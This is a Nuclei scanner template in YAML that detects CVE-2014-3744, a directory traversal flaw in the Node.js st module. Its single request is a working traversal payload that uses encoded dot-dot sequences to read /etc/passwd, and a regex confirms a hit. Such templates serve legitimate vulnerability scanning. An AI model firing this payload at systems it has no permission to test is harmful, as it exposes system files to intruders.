nuclei-templates/cves/2014/CVE-2014-3744.yaml

35 lines
1013 B
YAML

id: CVE-2014-3744
info:
name: Node.js st module Directory Traversal
author: geeknik
severity: high
description: A directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2014-3744
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
- https://snyk.io/vuln/npm:st:20140206
- https://nodesecurity.io/advisories/st_directory_traversal
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2014-3744
cwe-id: CWE-22
tags: cve,cve2014,lfi,nodejs,st
requests:
- method: GET
path:
- "{{BaseURL}}/public/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: regex
regex:
- "root:.*:0:0:"
# Enhanced by mp on 2022/02/24